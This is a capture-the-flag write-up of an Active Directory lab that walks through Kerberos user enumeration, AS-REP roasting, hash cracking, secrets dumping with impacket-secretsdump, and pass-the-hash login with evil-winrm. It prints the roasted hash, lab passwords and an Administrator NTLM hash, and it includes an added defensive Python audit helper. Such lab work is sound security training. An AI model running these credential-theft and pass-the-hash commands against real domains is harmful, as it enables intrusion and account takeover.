Attacktive Directory

AS-REP Roasting - SMB Enumeration - Dumping Secrets

Enumeration

Starting off with the scan

The domain name is spookysec.local and we see a bunch of services - DNS, IIS, Kerberos, RPC, NetBIOS, etc.

Let's start enumerating port 139 & 445 :)

Found Domain Name - THM-AD

Tried accessing some shares via anonymous login - Failed. This challenge provides us with a set of usernames and passwords, so let's use those for our next move :)

We will enumerate valid usernames against the DC using kerbrute

$ kerbrute userenum --dc <IP> -d spookysec.local userlist.txt

Initial Compromise

We can attempt to abuse a feature within Kerberos with an attack method called AS-REP Roasting

AS-REP Roasting is possible when a user account has the “Does not require Kerberos pre-authentication” flag set. This means that the DC will answer an AS-REQ for that account without the requester first proving knowledge of the account's password; since part of the returned AS-REP is encrypted with the account's password-derived key, that ticket material can be cracked offline.

$ impacket-GetNPUsers spookysec.local/ -no-pass -usersfile users.txt -dc-ip <target ip>

This shows that the user svc-admin can request a ticket with no password, and returns the AS-REP hash:

$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:408ee4a3e91ec877b931d35c56364c77$63dc9e093d6f3ddfd0074033786ed4d4d6e5f3e9f27be7f98866c0c91c4271c6c8a721eafa9e343a2b9638da64fe71d7563c31e51e6aac0686ba9025ab8ff2d41b8b24f38888cd803c70568744a12daa95cca16b73fa6bc5b20f1fb697b29fd1fe39fa0553ae07ad7e6e2f5232e306ee2abf3ee2ba8ebc704bc96f0d60cd245f96f4caa7c20c3a673fba2b25a384593b01e334560348a146d9168e1fc594b8c59e11382193bd2b3f1c421f9d5fdc61167c8f3bfa18d60fc6fca79923c16b707927719330363b593c28ccc0c7dd2c5e7696b43d45a4bc016341f773805c53f51d2b6ae4a0fa3c3280a18a9d53d9b5fd08337c

We can now crack this hash using john or hashcat (mode 18200)

svc-admin:management2005
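Two helpers, added here as an example (not code from the original write-up or from Impacket): an audit check for the "Does not require pre-authentication" condition described above, and a parser for the `$krb5asrep$` (hashcat 18200) line format that the GetNPUsers output is in. The userAccountControl values and the sample hash line are constructed.

```python
# Added example (not from the original write-up): a defender-side audit helper
# for the AS-REP roasting condition, plus a parser for the hashcat-18200
# ($krb5asrep$) line format that GetNPUsers prints. All sample values are constructed.
import re

# userAccountControl bits (Microsoft-documented values)
ACCOUNTDISABLE = 0x0002
NORMAL_ACCOUNT = 0x0200
DONT_EXPIRE_PASSWORD = 0x10000
DONT_REQ_PREAUTH = 0x400000  # "Does not require Kerberos preauthentication"

def asrep_roastable(uac: int) -> bool:
    """True when the account is enabled and skips pre-auth, i.e. anyone can
    obtain an AS-REP encrypted with its password-derived key."""
    return bool(uac & DONT_REQ_PREAUTH) and not (uac & ACCOUNTDISABLE)

def audit_preauth(accounts: dict) -> list:
    """Return the sAMAccountNames an attacker could AS-REP roast."""
    return sorted(name for name, uac in accounts.items() if asrep_roastable(uac))

_ASREP_RE = re.compile(
    r"^\$krb5asrep\$(?P<etype>\d+)\$(?P<user>[^@]+)@(?P<realm>[^:]+):"
    r"(?P<checksum>[0-9a-f]{32})\$(?P<edata>[0-9a-f]+)$")

def parse_krb5asrep(line: str) -> dict:
    """Split a hashcat-mode-18200 line into its fields. For etype 23 (RC4-HMAC)
    the 16-byte checksum is the HMAC-MD5 and edata is the RC4-encrypted
    enc-part of the AS-REP; both are derived from the user's key."""
    m = _ASREP_RE.match(line.strip())
    if not m:
        raise ValueError("not a $krb5asrep$ line")
    d = m.groupdict()
    d["etype"] = int(d["etype"])
    d["edata_len"] = len(d["edata"]) // 2  # ciphertext length in bytes
    return d

# Constructed sample: LDAP userAccountControl values for a few accounts
SAMPLE_ACCOUNTS = {
    "svc-admin": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD | DONT_REQ_PREAUTH,  # 0x410200
    "backup": NORMAL_ACCOUNT | DONT_EXPIRE_PASSWORD,
    "old-svc": NORMAL_ACCOUNT | DONT_REQ_PREAUTH | ACCOUNTDISABLE,  # disabled, not roastable
}

# Constructed sample line in the same format as the one captured above
SAMPLE_LINE = ("$krb5asrep$23$svc-admin@SPOOKYSEC.LOCAL:"
               "00112233445566778899aabbccddeeff$" + "ab" * 40)

if __name__ == "__main__":
    print(audit_preauth(SAMPLE_ACCOUNTS))  # ['svc-admin']
    print(parse_krb5asrep(SAMPLE_LINE)["edata_len"])  # 40
```

Feeding real userAccountControl values from an LDAP export into `audit_preauth` lists the accounts whose flag should be reviewed and removed.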

We can now continue our enumeration with these credentials, listing shares, etc.

One of the files had a base64-encoded string, and boom, it's a username and password!

backup@spookysec.local:backup2517860

Privilege Escalation

Wait, what? Don't tell me this is the DC's backup account :) Let's try dumping some secrets with these creds and check, though

$ impacket-secretsdump -just-dc backup@10.10.115.36

We dumped the Administrator's NTLM hash, so we can now pass the hash and gain admin privileges!

$ evil-winrm -i <target ip> -u Administrator -H 0e0363213e37b94221497260b0bcb4fc
